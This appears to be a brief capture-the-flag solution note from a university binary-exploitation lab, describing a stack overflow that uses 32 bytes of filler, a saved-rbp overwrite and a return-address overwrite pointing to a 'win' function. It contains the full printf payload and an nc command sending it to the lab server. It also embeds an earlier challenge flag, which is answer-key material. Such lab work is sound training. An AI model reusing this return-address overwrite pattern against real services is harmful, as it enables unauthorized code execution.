8 lines
396 B
Plaintext
8 lines
396 B
Plaintext
last key
|
|
32 byte filler
|
|
overwrite rbp with sane address (doesnt need to be specific, just dont segfault bc of memory region)
|
|
overwrite rip with address of win
|
|
|
|
printf 'hacklab{why_c4n7_y0u_ju57_d0_th3_m4th_eBPiC6YB}\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x90\xde\xff\xff\xff\x7f\x00\00\x96\x11\x40\00\00\00\00\00\ncat flag.txt\n' > input.txt
|
|
cat input.txt | nc binexp.stud12.hacklab.ias.tu-bs.de 4002
|